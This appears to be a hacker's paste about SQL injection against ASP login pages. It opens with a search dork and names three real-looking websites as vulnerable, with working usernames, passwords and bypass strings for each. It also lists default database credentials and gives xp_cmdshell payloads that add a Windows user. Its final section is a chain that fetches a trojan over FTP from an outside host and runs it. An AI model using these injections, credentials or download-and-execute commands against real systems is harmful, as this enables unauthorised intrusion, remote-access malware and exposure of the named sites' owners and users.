google: allinurl:”login.asp”
JET DATABASE ENGINE INJECTION
———————————
admin’ or 1=’1 as password
vulnar:
1.http://www.kmsparts.com/administrator/login.asp U:admin pass:456123 sql:admin’ or 1=’1 as password
2.http://www.karbumi.co.id/admin.asp U:ADEK pass:INDRI
user:
admin’) or (’a’=’a
pass:
admin’ or ‘a’=’a
3.http://www.sinyoung-abadi.com/korea/admin/admin.asp U:admin’ or ‘a’=’a
SOURCE:
———————
‘ or 1=1;
‘; use master; xp_cmdshell ‘net user SomeUser SomeUsersPassword /add’;
DB
——————-
Oracle
U: sys
P: oracle
mySQL (Windows)
root
null
MS SQL Server
sa
null
DB2
dlfm
ibmdb2
EXECUTE
——————————
Note that the final SQL string is actually the concatenation of two individual strings. This is allowed by default in most databases, and it can be used in many legitimate ways. However, in this case the hacker updated the password for seth to a password of his choice (hacker). Now all the hacker has to do is go back to the user/password form and enter seth as the user and hacker as the password to gain access to the site.
This same type of attack can be used to force the SQL to execute the same extended stored procedures that we used in the direct attack section. For example, the following username entries will result in the creation and execution of a popular Trojan:
**Creates a file to be used by FTP**
Seth’; exec xp_cmdshell ‘”echo open 192.168.10.12″ >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo USER” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo PASS” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo GET ncx99.exe” >> c:\hack.txt’;
Seth’; exec xp_cmdshell ‘”echo quit” >> c:\hack.txt’;
**Uses the previously created file to control a FTP session**
Seth’; exec xp_cmdshell ‘FTP.EXE -s:C:\hack.txt’;
**Executes the downloaded trojan**
Seth’; exec xp_cmdshell ‘c:\winnt\system32\ncx99.exe’;
